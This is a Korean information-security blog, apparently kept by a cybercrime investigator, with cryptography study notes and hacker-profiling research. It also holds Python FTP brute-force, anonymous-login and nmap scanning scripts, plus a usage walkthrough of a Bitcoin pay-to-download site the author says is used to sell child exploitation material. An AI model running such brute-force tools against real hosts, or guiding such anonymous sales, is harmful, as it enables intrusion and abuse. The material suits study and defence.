Information Security2021. 8. 28. 22:48
반응형

1. 암호와 관련된 기본원칙(. 케르코프의 원칙)

- (케르코프의 원칙) 암호알고리즘은 적의 손에 떨어질 가능성이 있으므로, 암호체계의 안전성은 암호알고리즘의 비밀을 지키는 것에 의존되어서는 않되고, 키의 비밀성에만 의존해야함. 암호학을 art의 개념에서 기술의 개념으로 변화

- (크로드 새넌) 적도 우리가 쓰는 시스템(알고리즘)을 알수 있다

- 알고리즘과 분리된 다른 키를 가져야 하며, 암호키를 암호문에 포함시켜서는 않됨

 

2. Open Crypto Design의 장점

- 공표된 암호설계는 대중의 정밀한 감시를 받게 되므로 광범위한 학습을 통해 더 강해질 가능성이 높음

- 만약 보안 결함이 존재한다면, 윤리적 해커에 의해 밝혀질 수 있음

- 역공학과 산업스파이는 사라지게 됨

- 표준을 제정할 수 있음

 

3. Cryptanalysis 공격 시나리오

암호문 단독 공격(Ciphertext-Only Attack)

- 공격자가 암호문을 얻어서 대응되는 평문이나 키를 찾아내려는 공격

알려진 평문 공격(Known-Plaintext Attack)

- 공격자가 미리 수집한 평문·암호문 쌍을 사용하여 같은 키를 사용하는 암호문을 해독하려는 공격으로 엘런튜닝이 에니그마를 해독할 때 사용한 방법

- 보통 패킷의 해더가 알려진 평문이 됨

선택 평문 공격(Chosen-Plaintext Attack)

- 공격자가 암호알고리즘에 접근하여 선택한 평문에 대한 암호문을 수집한 후, 특정 암호문을 해독하려는 공격

선택 암호문 공격(Chosen-Ciphertext Attack)

- 공격자가 복호알고리즘에 접근할 수 있어 선택한 암호문들에 대한 평문들을 수집한 후, 특정 암호문을 해독하려는 공격

 

4. Shift Cipher의 동작원리

- 이동암호 또는 시저암호라고 불리는 단일문자 대치암호

- 문자와 암호문은 항상 일대일 대응관계로 평문의 알파벳을 일정한 키값만큼 평행이동(밀어내기) 시킴으로서 암호화하는 방법

- 알파벳의 경우 25개의 키만 사용할 수 있기 때문에 전수조사 공격에 의해 쉽게 무력화 됨

 

5. Kasiski 공격의 원리 (, 고전암호가 안전하지 않은 이유)

- (Kasiski 공격) 고전 암호 중 빈도부석법으로는 해석이 불가능한 난고불락의 비제네르암호(복합알파벳-다중 치환암호)를 해독한 방법

- 암호문에서 ‘the’와 같이 흔한 특정 단어가 반복적으로 나오는 주기를 이용해 키워드의 길이를 찾아내는 방식으로 암호문의 길이가 길 때 유효하게 사용할 수 있음

- 고전암호는 전수조사 방식, 통계적 분석방식(알파벳 출현빈도), 수학적 분석 등을 통해 암호문단독 공격기법(Ciphertext only attack)만으로도 해독이 가능

고전암호의 경우 빈도수에서 암호문이 여전히 랜덤하지 않음

 

6. Onetime Pad의 원리 (, Perfect Secrecy의 원리)

- 스트링 암호의 일종으로 데이터 길이와 같은 크기의 암호키를 활용하여 평문과 암호키의 XOR 연산을 통해 암·복호화 하는 방식

- 키의 길이, 평문의 길이, 암호문의 길이가 모두 같으며, 키를 1번만 사용하는 방식으로 메시지와 암호문의 관련성이 없어 완벽한 비밀성(Perfect Secrecy)을 제공

- 매번 평문과 같은 크기의 키를 생성·유지하는 어려움으로 실용성이 낮음

 

7. Practical Security?

- 완벽한 비밀성을 완화한 개념으로 보안은 수행가능한 시간적 수준에서 유능한 으로부터 지켜지는 것을 말함

- 적들이 성공할 가능성이 매우 작아야 하며, 이때 작다는 너무 작아서 실제 발생될 수 있다고 염려되지 않을 정도로 작은 수준을 의미함

 

8. Pseudorandom number generator?(의사난수 생성기)

- 컴퓨터 소프트웨어적인 방법에 의해 난수열을 의사적으로 생성하는 알고리즘으로 암호에서 난수는 키 생성이라는 중요한 역할을 담당

- 진정한 난수는 주기성이 없으나, 컴퓨터에서 발생시키면서 커다란 주기를 갖게 되어 진정한 의미의 난수는 아니지만 사용상 난수로 간주해도 무방한 수준의 값을 생성

- LCG(Linear Conguential Generator) - 가장 일반적이지만 안전하지 않음

< Xn+1 = (aXn + c) mod m >

- LFSR(Linear Feedback Shift Register) - 스트림 암호

- BBS(Blum-Blum-Shub)Fortuna 선형방정식을 보완

< Xn+1 = (Xn)2 mod M, M=pq(큰소수 곱셈) >

- ANSI X9.17FIPS 186-2 : 표준, CryptoGenRandom()

 

9. rand() 함수가 안전하지 않은 이유

- 자연발생적인 난수와 달리 컴퓨터 시스템에서 무작위로 난수를 추출할 수 없기 때문에 ‘random seed’라고 불리는 수열의 집합을 사용하여 유사난수를 추출하게 된다. 따라서 random 함수 값은 seed에 종속되게 되며, seed 개수에 따라 난수가 고르게 분포하지 않거나 동일한 값이 나올 확률이 있게 됨

- 생성된 난수의 분포가 고르지 않고, 반복주기가 상대적으로 짧으며, 공격자에게 seed를 간파당할 수 있음

 

10. Self-Synchronise 스트림 암호의 동작 원리

- 평문의 암호화 연산을 위한 키 값을 생성할 때 키 값의 각 비트가 이전의 암호문의 고정된 값을 순차적으로 담는 방식으로 동작

- 따라서 암호화 문자열 전송 시에 일부 비트 값이 바뀌거나, 혹은 비트가 사라지고 추가되는 오류가 발생하여도 일부분만이 복호화에 실패할 뿐 그 후에는 다시 정상적인 복호화 값을 얻을 수 있는 자기 동기성을 가지게 됨

 

11. ConfusionDiffusion의 개념

- 암호학자 클로드 새넌(Claude Shannon)이 제안

- Confusion(혼란) : 암호문에서 Key의 추론이 어렵도록 키와 암호문의 관계를 가능한한 복잡하게 만드는 것(바꿔치기substitution)

- Diffusion(확산) : 암호문에서 평문의 추론이 어렵도록 평문의 통계적 구조를 암호문 전반에 퍼뜨려 숨기는 것(섞기permutation)

 

12. SPNFN의 비교

- SPN은 평문을 4바이트로 분할해 바꿔치기(substitution, S-box)하고 순서 뒤섞기(permutation, P-box)를 수행하여 한 라운드를 종료하고, 다음 라운드를 반복하여 블록 암호문을 만듦. 암호키는 각 라운드마다 바뀜

- FN은 암·복호화 과정에서 역함수가 필요 없음. 평문 블록을 2등분한 후, 오른쪽 값은 다음 라운드의 왼쪽 값으로 이용되며, 왼쪽 값은 오른쪽 값에 라운드키 k를 적용한 함수계산으로 도출된 값과 XOR 연산을 수행하여 다음라운드의 오른쪽으로 이용된다. 이러한 라운드를 여러번 반복하여 수행되며 DES의 경우 16회의 라운드가 반복됨

 

13-1. DES, 2DES, 3DES의 문제점들

DES의 문제점

- 키의 크기가 56bit에 불과하여 전수조사 공격에 취약

- 미국 NAS가 비밀리에 관여되어 있었고, 설계과정이 비공개로 진행

- 최초 IBM이 제안한 128bit에서 64bit로 키의 길이가 줄어들었음

- DES의 안전성이 다수의 S-BOX에 의존적임

- weak (ex. 0101 0101 0101 0101)가 존재함(하드코딩으로 빼버림)

2DES의 문제점

- 두 개의 키로 두 번의 암호화를 하여 키의 크기가 128bit로 증가하는 것 같지만 known-plaintext attack을 활용한 meet in the middle attack(중간일치 공격)으로 57bit 수준의 안전성 밖에 제공하지 못하여 DES와 같이 전수조사에 취약

3DES의 문제점

- meet in the middle attack을 대비하기 위해 3중 암호화를 적용하여 공격의 복잡도를 112bit로 증가시켰으나, ·복호화에 같은 알고리즘을 사용하여 잇따른 DES챌린지 대회에서 DES가 깨지기 시작한데다, 처리속도가 상대적으로 빠르지 않아 AES암호화가 정착되기 전 일시적인 대체수단으로 사용

 

13-2. DES의 구조

- 64bit의 평문을 64bit의 암호문으로 암호화하는 대칭암호 알고리즘으로 키는 56bit이며, 2개의 전치박스(P-Box, 초기-최종)16개의 라운드 함수로 구성되어 16회의 반복적인 암호화 과정을 거침

- 각 라운드마다 48bit의 라운드키를 사용하여 암호문을 생성하며, FN 암호구조 사용

 

14. AES의 구조

- 평문·암호문 : 128bit, : 128, 192, 또는 256bit

- 키의 크기에 따라 10, 12, 14 라운드 수행

 

15. Mode of operation : CTR, CBC를 중심으로

- Mode of operation(블럭 암호운용 모드)은 암호 알고리즘을 반복 적용하여 임의의 길이를 가지는 평문 전체를 암호화 하는 것을 말함

CTR(Counter) Mode

- 같은 평문이면 같은 암호문 블록이 나오게 되는 문제를 해결하기 위해 Counter 증가 값을 암호문에 대입시키는 방법

- 암호화 : ci = Ek(ctr+i) mi = Fk(ctr+i) mi

- 복호화 : mi = Dk(ctr+i) ci = Fk(ctr+i) ci

- 장점 : 암호문을 독립적(병렬적)으로 처리(ECB의 장점 유지)할 수 있어 빠른 암호화를 수행할 수 있음

- 단점 : 카운터가 되는 수를 재사용하면 동일암호 블록이 발생되므로 반드시 바꿔줘야 함

 

CBC(Cipher Block Chaining) Mode

- 블록을 체인처럼 연결하여 작업하여 병렬식 처리가 않됨

- 과거에 가장 많이 쓰였다가 최근 줄어드는 추세임

- 암호화 : ci = Ek(ci-1 mi) = Fk(ci-1 mi)

- 복호화 : mi = Dk(ci) ci-1 = Fk-1(ci) ci-1

 

16. 안전한 일방향 해쉬함수의 동작원리(즉 요구조건)

압축(compression)

- 임의의 유한한 크기의 입력을 작은 고정된 크기의 값으로 만들 수 있어야 함

쉬운계산(ease of computation, Digest)

- 주어진 입력에 대한 계산이 쉬워야(빨라야)

단방향성(primage resistance = one-wayness)

- 함수의 계산은 일방적이어야 하고, 역방향 계산이 되지 않아야 함

약한 성질의 충돌저항성(2nd-primage resistance = weak collision resistance)

- 주어진 입력값과 동일한 해시결과를 가져오는 또 다른 입력값을 공격자가 구하지 못하게 해야 함

강한 성질의 충돌저항성(Collision resistance = strong collision resistance)

- 공격자가 같은 해시값을 가지는 입력값을 미리 찾지 못하게 해야 함

 

17. MAC의 구성방법과 요구조건

- Message Authentication Code(메시지 인증코드)는 데이터의 무결성을 검증하는데 이용되는 기법으로 수신받은 데이터가 전송된 것과 동일함을 보장하고, 메시지가 생각했던 통신상대로부터 전송된 것인지 확인하기 위한 기술(무결성+인증)

- 요구조건

(1) MAC는 해시함수(function hk)의 가족임

키값을 알고 있다면 계산이 쉬워야 함(ease of computation)

압축(compression), 임의의 길이의 입력값을 고정된 크기로 만들어야 함

계산저항성(computation resistance) : 주어진 (x, hk(x))로 입력값이 서로 다른(xx) 새로운 쌍(x, hk(x))을 계산할 수 없어야 함

(2) 공격

MAC 키에 대한 전수조사공격(known-text attack)2t 연산을 요구

MAC 추정(guessing)은 반드시 2n 연산을 요구해야 함

정확한 키 없이 다른 방법이 없어야 함

 

18. 공개키 암호의 기반 난제

소인수 분해(Integer Factoring) : 주어진 큰 정수의 소인수분해를 찾는 것

- N=pq 에서 N에서 소수인 pq를 찾는 문제로 RSA의 안정성과 관련됨

이산대수문제(Discrete Logarithm) : 주어진 큰 정수에 대해 유한순환군(finite cyclic group)에서 이산대수를 찾는 것

- Y = g^x mod p 가 주어졌을 때 Y를 통해 X를 찾는 문제

) Y = 2^x mod 3 에서 Y1이라고 할 때, X2, 4, 등이 있음.

<g> = {e, g, g^2, g^n-1}

 

19. Diffie-Hellam Key Exchange (개념과 문제점 및 해결방안)

개념

- 대칭키를 서로 만난적 없는 사람끼리 도청되는 통로를 통해 교환하는 방법

- 이산대수문제를 통해 공통의 비밀값을 만들어내는 방법

- 안전한 키 교환을 위해 pg의 선택이 중요함. 비슷한 크기의 pg가 선택되어야 하고, 통신 양측은 충분히 안전한 난수생성 알고리즘을 사용해야 함

문제점

- 비밀정보를 공유할 수 있지만 상대방에 대한 인증은 보장되지 않아 중간자 공격(man in the middle attack)에 취약함

해결방안

- 서명값 등을 이용한 상호인증

- 컴퓨터보안의 기본은 접근통제임(주체 행동(작동) - 객체)

 

20. RSA 암호와 서명의 원리

RSA 암호의 원리

- 소인수분해의 어려움에 기반을 두고 개발한 공개키 암호화 방식

- 두개의 크기가 비슷한 랜덤한 소수 pq를 선택

- n = pq, φ(n) = (p-1)(q-1)

※ φ(오일러함수) : n보다 작은 n과 서로소인 양의 정수 갯수

- e, 1 < e < φ, gcd(φ, e) = 1 (φe의 최대공약수가 1, 즉 서로소임)

- ed1 mod φ (edφ로 나누었을때 나머지가 1이어야 함)

- Alice의 공개키는 (n, e)가 되고 Alice의 비밀키는 d가 됨

- 암호화 : compute c = m^e mod n (암호문은 메세지의 e승을 n으로 나눈값의 나머지)

- 복호화 : m = c^d mod n (복호화는 암호문의 d승을 n으로 나눈값의 나머지)

- 이유 : c^d mod = m^ed mod n = m^1modφ(n) mod n = m^1+kφ(n) mod n = m

RSA 서명의 원리

- 메시지인증코드(MAC)의 한계(3자에 대한 증명 및 부인방지 문제) 해결

- 송신자는 메시지를 송신자 비밀키로 암호화 + 수신자 공개키로 암호화, 수신자는 암호문을 수신자의 비밀키로 복호화 + 송신자의 공개키로 복호화

- 송신자의 비밀키에 의한 암호화

해쉬함수를 이용한 검증 원리

키 생성 : n, p(소수), q(소수), e(공개키), d(개인키)

서명 : compute s = h(m)d mod n, 서명 : (m, s)

검증 : 송신자의 공개키 획득 (n, e)

h(m) = s^e mod n 을 만족하는지 검증

왜냐하면 s^e = (h(m)^d)^e mod n

 

1) H(m) : 우선 메시지를 해쉬화한다

2) S = H(m)^d : 해쉬화한 메시지를 RSA 개인키를 사용해 암호화 한다

3) (m, S) : 메시지와 암호화된 메시지를 함께 전달

4) S^e = H(m) : RSA 공개키를 사용해 암호화된 메시지를 복호화한다

5) H(m) : 송신 받은 메시지에 대한 해시값을 구함

6) H(m) = S^e : 서명을 복호화한 값과 메시지의 해시값이 일치하면 인증 성공을 의미

 

1), 2) m H(m) H(m)^d = S

3) (m, S)

4), 5), 6) S^e H(m) = H(m) m

반응형
Posted by CCIBOMB
반응형

<bittnexx.com>

bittnexx.com은 비트코인을 송금하면 파일을 다운로드 할 수 있게 해주는 플랫폼이다.

익명성과 자동화가 특징이다.

아동성착취물 사이트 내에서 동영상, 사진 공유 등을 목적으로 다크웹 상에서

비트코인 결제 플랫폼으로 활용되고 있다.

 

 

< 사용법 : 업로더 >

해당 사이트에 1. 파일을 업로드 하고,

2. 원하는 비트코인 금액을 설정만 하면,

3. 다운로드 링크가 부여된다.

4. 공유를 원하는 경우 이 다운로드 링크를 뿌리면 된다.

 

 

< 사용법 : 다운로더 >

해당 링크로부터 파일 다운로드를 원하는 사용자들이

1. 정해진 금액 상당의 비트코인을 송금하고,

2. 트랜잭션 넘버를 입력하면,

3. 사이트에서 자동으로 해당 거래를 검증한 뒤,

4. 다운로드가 된다.

 

 

캡쳐화면을 첨부하여 다시 설명하면 다음과 같다.

< 사용법 : 업로더 >

1. 'START' 버튼을 누른다.

 

2. 업로드할 파일을 선택하고, BTC 금액과 입금받을 BTC 지갑주소를 설정한다.

 

※ 업로드 테스트한 그림파일

1) 파일이름 : 그림2.png

2) MD5 : CA486259FB18AD9714F9077D493D4621

3) 파일크기 : 178KB (182,344 바이트)

 

3. 완료시, 1) 다운로드 링크 주소와 2) 편집 및 통계확인이 가능한 링크 주소 두 개가 각각 생성된다.

 

4. 해당 파일을 다운로드하고 싶어하는 사람들에게 1) 다운로드 링크 주소를 배포하면 된다.

 

5. 편집 및 통계확인이 가능한 링크주소는 별도의 인증절차가 없으니 혼자 잘 간직하는 게 좋다.

비트코인 금액과 다운로드 가능횟수, 파일에 대한 설명 등을 편집할 수 있다.

 

 

< 사용법 : 다운로더 >

1. 파일 다운로드 링크에 접속하면, 다음과 같이 파일명이 암호화되고 비트코인 금액이 기재된 페이지가 나온다. 

아래 다운로드 버튼을 누른다.

 

2. 비트코인 지갑 또는 웹거래소 등을 이용하여 비트코인을 송금한다.

 

3. 해당 트랜잭션 넘버를 입력한다.

 

3. 사이트에서 5분동안 해당 거래를 검증한 뒤, 다운로드가 가능하다.

 

4. 정상적으로 다운로드 된 파일

1) 파일이름 : 그림2.png

2) MD5 : CA486259FB18AD9714F9077D493D4621

3) 파일크기 : 178KB (182,344 바이트)

반응형
Posted by CCIBOMB
반응형
반응형
Posted by CCIBOMB
반응형

오픈소스 프로젝트 '위글닷넷(wigle.net)'

 

워드라이빙을 통한 AP의 물리적 위치 수집결과를 오픈소스로 공개한 웹사이트이다.

 

제주는 거의 수집되지 않았지만, 서울은 꽤 빽빽하게 수집되어 있다.

 

제주 : 

https://wigle.net/map?maplat=33.36783675232708&maplon=126.58655045200037&mapzoom=10&coloring=density

 

WiGLE: Wireless Network Mapping

 

wigle.net

 

 

서울 :  

https://wigle.net/map?maplat=37.568405055799005&maplon=126.97783000000004&mapzoom=10&coloring=density

 

WiGLE: Wireless Network Mapping

 

wigle.net

반응형
Posted by CCIBOMB
반응형

import ftplib, time

def bruteLogin(hostname, passwdFile):
    pF = open(passwdFile, 'r')
    for line in pF.readlines():
time.sleep(1)
        userName = line.split(':')[0]
        passWord = line.split(':')[1].strip('\r').strip('\n')
print "[+] Trying: "+userName+"/"+passWord
        try:
            ftp = ftplib.FTP(hostname)
            ftp.login(userName, passWord)
            print '\n[*] ' + str(hostname) +\
      ' FTP Logon Succeeded: '+userName+"/"+passWord
            ftp.quit()
            return (userName, passWord)
        except Exception, e:
            pass
    print '\n[-] Could not brute force FTP credentials.'
    return (None, None)


host = '192.168.95.179'
passwdFile = 'userpass.txt'  # 다수의 ID:PW로 구성된 txt 파일
bruteLogin(host, passwdFile)

반응형
Posted by CCIBOMB
반응형

import ftplib

def anonLogin(hostname):
    try:
        ftp = ftplib.FTP(hostname)
        ftp.login('anonymous', 'me@your.com')
        print '\n[*] ' + str(hostname) +\
          ' FTP Anonymous Logon Succeeded.'
        ftp.quit()
        return True
    except Exception, e:
        print '\n[-] ' + str(hostname) +\
  ' FTP Anonymous Logon Failed.'
return False


host = '192.168.95.179'
anonLogin(host)

반응형
Posted by CCIBOMB
반응형

#python-nmap 설치: http://xael.org/norman/python/python-nmap/

#Nmap은 결과값을 xml 형식으로 생성 -> 파이썬 xml 구문분석 라이브러리를 이용하여 모든 기능 활용 가능

 

import nmap
import optparse

def nmapScan(tgtHost,tgtPort):
    nmScan = nmap.PortScanner()
    nmScan.scan(tgtHost,tgtPort)
    state=nmScan[tgtHost]['tcp'][int(tgtPort)]['state']
    print "[*] " + tgtHost + " tcp/"+tgtPort +" "+state

def main():
    parser = optparse.OptionParser('usage %prog '+\
                                   '-H  -p ')
    parser.add_option('-H', dest='tgtHost', type='string',\
                      help='specify target host')
    parser.add_option('-p', dest='tgtPort', type='string',\
                      help='specify target port[s] separated by comma')
    
    (options, args) = parser.parse_args()
    
    tgtHost = options.tgtHost
    tgtPorts = str(options.tgtPort).split(',')
    
    if (tgtHost == None) | (tgtPorts[0] == None):
        print parser.usage
        exit(0)
    for tgtPort in tgtPorts:
        nmapScan(tgtHost, tgtPort)


if __name__ == '__main__':
    main()

반응형
Posted by CCIBOMB
반응형

해커 프로파일링 FTF Interview 연구의 활용방안

 

본 연구의 결과인 해커 프로파일링을 위한 대면설문 기법은 해커와 해킹에 대한 이해 부족한 수사관에게는 일종의 가이드가 되어줄 수 있으며, 검거된 사이버범죄자(해커) 대해 체계적으로 데이터를 축적하여, 기 축적된 악성프로그램 샘플 등 사이버위협정보 함께 연계분석을 시도하는 것은 잠재적으로 정책결정자와 수사관들에게 사이버범죄(해킹)에 대한 심층적인 지식을 제공해줄 수 있다. 이러한 지식은 정책결정자와 수사관들이 국민들을 더욱 잘 보호할 수 있는 교두보로서 역할을 해줄 수 있을 것으로 기대하며, 동시에 보다 효과적으로 가용한 자원을 계획적으로 활용할 수 있을 것이다.

 

 

1. 해커 프로파일링 데이터베이스 구축

 

사이버범죄, 특히 해킹의 경우 초국가적 특성을 가지긴 하지만, 범죄의 특징 및 범죄자의 성향, 생태적 속성은 국가마다, 문화마다 각기 다르므로 외국에서 개발한 프로파일링 체계를 한국에 도입·운용하기 위해서는, 한국의 범죄 데이터에 기초하여 개발되어야 한다. 실증적으로 정확한 프로파일링 데이터베이스를 구축하기 위해서는, 경찰서 사이버수사팀부터 지방청 사이버수사대, 경찰청 사이버안전국 사이버테러수사팀까지 정보통신망침해범죄(해킹 등)를 저지른 피의자에 대한 조사시 동일한 사이버범죄(해커) 프로파일링 기법을 적용하여야 한다. 이 때 일반적인 피의자 신문조서의 보충적 성격으로 본 연구에서 제안한 방식의 해커 대면 설문기법이 적용 가능하며, 실제 범죄에 가담하여 검거한 해커들에 대한 데이터를 체계적으로 입력할 수 있도록 데이터베이스를 구축하고 지속적으로 관리하는 전담조직이 구성되어야 한다. 이와 같이 축적된 해커들에 대한 상세한 프로파일링 데이터를 다양한 사이버위협정보 데이터(경찰청 사이버안전국의 사이버테러 프로파일링 시스템·악성코드 분석시스템, 한국인터넷진흥원의 사이버위협정보 공유시스템 등)와 함께 분석할 경우, 동일 유형의 미제사건 해결 및 미상의 공격자에 대한 추론이 가능할 것이다.

 

 

2. 사이버범죄자(해커) 프로파일링의 수사실무적 활용 

 

수사실무적 측면에서 프로파일링은 여러가지 목적으로 사용될 수 있으나, 일반적으로 세 가지 주된 목적을 가진다(박광배 등, 2001). 첫째는 범죄자의 사회심리학적 특성을 파악하는 것이고, 둘째는 범죄자가 사용한 도구나 소유물의 심리적 의미를 파악하는 것이며, 셋째는 용의자의 신문과정에서 수사관이 활용할 수 있는 전략적 정보를 제공하는 것이다.

프로파일링은 범죄자의 연령, 인종, 성별, 직업, 종교, 혼인여부, 교육수준 등에 대한 정보를 제공한다. 이러한 정보들에 의하여 수사기관은 용의자의 범위를 축소하고, 수사의 초점을 정할 수 있다. 또한 프로파일링은 범죄자의 심리적 상태에 대한 정보도 제공하는데, 심리적 상태에 대한 정보는 추가범죄의 가능성을 가늠케 한다. 피해자의 신변용품, 사진 등과 같이 범죄자가 소유하고 있는 물건들은 특정한 용의자와 범죄의 연결고리를 확정하는 매우 중요한 단서가 될 수 있다.

본 연구결과를 이용한 사이버범죄자(해커) 프로파일링은 강력범죄를 기반으로 한 프로파일링 기법을 사이버범죄에 맞게 재해석한 것으로, 용의자에 대한 심문과정에서 수사관이 알아내야 할 가장 중요한 사실이 무엇인지 등에 대하여 많은 정보를 제공할 수 있다. 수사관의 동일한 질문에 대하여 각기 다른 용의자들은 다르게 반응하기 마련인데, 프로파일링은 특정한 용의자가 만약 진범이라면 그 용의자가 특정한 질문에 대하여 어떻게 반응할지를 수사관에게 미리 알려줄 수 있다.

 

 

3. 사이버범죄자(해커) 프로파일링의 정책평가적 활용

 

프로파일링은 범죄수사를 위한 미시적 기법으로서만 유용한 것이 아니다. 범죄와 관련된 법적, 행정적 정책의 타당성과 성공여부를 예측하고 진단할 수 있는 개념으로서 거시적 유용성을 가진다.

국가는 기 발생한 범죄를 효율적으로 해결하고, 앞으로 발생할 범죄를 사전에 방지하기 위하여 다양한 정책과 제도를 활용한다. 특히, 사이버범죄의 경우 전통적인 오프라인상의 범죄와는 달리 시·공간의 제약을 받지 않기 때문에 짧은 시간 안에 많은 피해자들을 발생시킬 수 있으며 초국가적 성격을 가지므로 사후적 대응보다는 사전예방 정책에 초점을 맞추어야 한다(장윤식, 2014).

검거된 사이버범죄자(해커)들의 프로파일링 결과를 기반으로 하여 잠재적으로 재범가능성이 높은 전과자들의 재범을 예방할 국가정책을 수립, 시행하는데 유용할 수 있다. 또한 예를 들어 일정 연령의 또래집단에서 해킹 기술을 처음 습득하게 되는 사실을 알아내는 등 범죄로 이어지는 해커들의 일반적 또는 구체적 특징을 찾아낼 수 있는데, 이를 활용하여 해당 집단을 겨냥한 법률 또는 사회 프로그램을 정립할 수 있다. 나아가 새로운 법률 또는 정책의 실패가능성을 이해하고, 이에 대한 보완책으로 무엇이 필요할지 예측하고 준비할 수 있다.

 

반응형
Posted by CCIBOMB
반응형

1. 해커 프로파일링 FTF Interview 설문문항 최종 구성

 

본 연구를 통하여 최종 완성된 척도는 다음과 같다. 해커의 특징을 확인하고 분류하는 해커 프로파일링(hacker profiling)’을 하기 위해서는 일단 해커가 다음의 각 척도 문항에 응답을 하도록 한다. 자기기입식 설문형으로 해커가 스스로 척도문항에 대한 답변을 선택할 수 있도록 구성하였다.

 

분류

설명요인

문항수

원인요소

개인
수준

인구통계

성별, 나이, 거주지역, 병역, 결혼, 직업 등

12

지성, 기술적능력

학력, 전공, 기술적능력, 기술습득방식 등

13

인성

공격성, 자긍심, 자아의식, 자기통제력 등

42

주위
관계수준

사회적능력

주위일상긴장, 주위낙인, 차별강화 등

17

사회문화수준

사이버하위문화, 네티즌 참여통제

4

상황기회수준

범죄친구, 인터넷중독, 범죄기회 등

17

결과요소

범죄수행

해킹경험, 해킹빈도, 공격방식/효과 등

61

해킹태도

해킹에 대한 태도, 향후계획 등

12

범죄의도

검거여부에 따른 해킹의지 등

8

 

개인수준

 

일반 인구통계학적 질문

귀하에게 해당되는 항목에 표시해 주십시오

 

1. 성별 : / 2. 출생년도(태어난해) :

 

3. 거주지역 : 서울 / 경기·인천 / 수도권 외 광역시 / 기타

 

4. 종교 : 기독교 / 천주교 / 불교 / 기타 / 없음

 

5. 경제수준(주관적) : / 하중 / / 중상 /

 

6. 병역 : 미필 / 7. 결혼 : 기혼 / 미혼

 

8. 자녀 : 있다 / 없다

 

9. 직업

9-1. 소속 : 공무원 / 공공기관 / 회사원 / 자영업 / 기타

9-2. 분야 : 정보보안 관련 / 컴퓨터 관련 / 기타 / 미취업 / 학생

 

10. 정치성향 : 보수(우파) / 중도 / 진보(좌파) / 관심없음

 

11. 기타 신체특징 또는 의료이력 등이 있다면 적어주세요.

( )

 

 

기술적 요인

다음은 기술적 능력에 대한 질문들로 구성되어 있습니다. 귀하에게 해당되는 항목에 표시해 주십시오

 

1. 학력 : 중졸이하 / 고졸(재학포함) / 대졸(재학포함) / 석사이상 / 무응답

 

2. 전공 : 컴퓨터(정보보호) / 기타 공학 / 이학 / 문과 / 기타( )

 

3. 컴퓨터 관련 보유 자격증 중복 체크 가능

: 정보처리기사, 정보보안기사, 정보처리기능사, 컴퓨터활용능력, 워드프로세서, CISSP, CEH, HFI, EnCE, CCNA, CCNP, 리눅스마스터, OCJP, 기타( )

 

4. 기술적 능력

4-1. 분야별 기술적능력(주관적)

 

4-2. 해킹 관련 보유기술 중복 체크 가능

: 웹해킹 / 네트워크해킹 / 시스템해킹 / 커널해킹 / 리버스 엔지니어링 / 디지털포렌식(모바일포렌식 포함) / IoT 해킹(임베디드해킹) / 기타( )

 

4-3. 해킹 능력(종합) 아래 문항 중 1개만 선택

발표되지 않은 새로운 취약점을 발견하여 해킹 수행코드를 작성할 수 있다

기존에 발견된 취약점에 대한 해킹 수행코드를 작성할 수 있다

발표된 Exploit Code를 해킹하려는 시스템에 적용되도록 수정하여 해킹에 성공할 수 있다

발표된 Exploit Code를 해킹하려는 시스템에 적용되도록 수정하는 등 해킹기법을 모두 이해하나, 실제 해킹에 성공은 한 경험은 적다

발표된 Exploit Code100% 이해하지는 못하나, 기존에 알려진 시스템이나 각종 서비스 취약점에 대해 여러 명령어를 이용해 해킹할 수 있는 능력이 있다

해킹 커뮤니티를 통해 각종 해킹 Tool을 다운로드 받아, UNIX 기반 등에 설치하여 공격할 수 있다

Unix 시스템은 사용해본 경험이 적어 Windows GUI 형태의 해킹 프로그램을 선호하고, 시스템 명령어를 다소 사용할 수 있으며 네트워크와 시스템에 대한 지식을 다소 가지고 있다

해킹 커뮤니티 등에서 구할 수 있는 해킹 프로그램, 크랙 도구 등으로 모든 사이트를 해킹할 수 있다

 

4-4. 해킹대회·모의해킹·취약점신고·논문 및 기술문서·컨퍼런스 발표 참여횟수 : ( )

참여 대회명 등을 알려줄 수 있으시다면 기재해주세요 : ( )

 

4-5. 해킹 관련 기술습득(학습) 방식

1) 최초 습득시기 : 초등학교 / 중학교 / 고등학교 / 대학교 이후

 

2) 학습기간 : 6개월 이하 / 1~2년 이하 / 3~4년 이하 / 5~6년 이하 / 7년 이상

 

3) 1일 평균 학습시간 : 1시간 이하 / 2시간 이하 / 3시간 이하 / 4시간 이하 / 4시간 이상

 

4) 습득방법(학습방법) 중복 체크 가능

: 학교 / 학원 / 온라인 커뮤니티 / 오프라인 커뮤니티 / 인터넷 / 서적 / 기타( )

 

5) 최초 습득동기

: 드라마,영화 / / 재미 / 경제적 / 피해경험 / 게임해킹 / 전공 / 기타( )

 

6) 소속 커뮤니티 중복 체크 가능(답변 생략 가능)

: 쿠시스, 파도콘, 널루트, 해커스랩, 와우해커, 포렌식인사이트, 보안대첩, 버그트럭, 보안인닷컴, 시큐리티오버라이드, 인코그니토, 코드엔진, SUA, , BOB, UUU, 기타( )

 

인성적 요인

 

1. 다음은 공격성에 대하여 알아보는 설문입니다. 귀하에게 해당되는 정도를 각각 매겨주십시오

 

2. 다음은 자긍심에 대하여 알아보는 설문입니다. 귀하에게 해당되는 정도를 각각 매겨주십시오

 

3. 다음은 자아의식에 대하여 알아보는 설문입니다. 귀하에게 해당되는 정도를 각각 매겨주십시오

 

4. 다음은 애국심에 대하여 알아보는 설문입니다. 귀하에게 해당되는 정도를 각각 매겨주십시오

 

5. 다음은 윤리의식에 대하여 알아보는 설문입니다. 귀하에게 해당되는 정도를 각각 매겨주십시오

6. 다음은 자기통제력에 대하여 알아보는 설문입니다. 귀하에게 해당되는 정도를 각각 매겨주십시오

주위관계수준

사회적 요인

 

1. 다음은 일상긴장에 대하여 알아보는 설문입니다. 귀하에게 해당되는 정도를 각각 매겨주십시오

 

2. 다음은 주변의 인식에 대하여 알아보는 설문입니다. 귀하에게 해당되는 정도를 각각 매겨주십시오

 

3. 다음은 해킹에 대한 인식에 대하여 알아보는 설문입니다. 귀하에게 해당되는 정도를 각각 매겨주십시오 (상대방의 동의를 얻은 모의해킹 등 제외)

 

 

사회문화수준

환경적 요인

각 문항에 대하여 귀하의 생각과 일치하는 정도에 표시해주십시오 (상대방의 동의를 얻은 모의해킹 등 제외)

 

상황기회수준

상황기회 요인

 

1. 다음은 주위 친구 중 해커(화이트햇, 블랙햇, 그레이햇 포함)가 있는지 알아보는 설문입니다

 

2. 다음은 인터넷 이용시간 관련 질문입니다. 귀하에게 해당되는 시간을 각각 표시해주세요

 

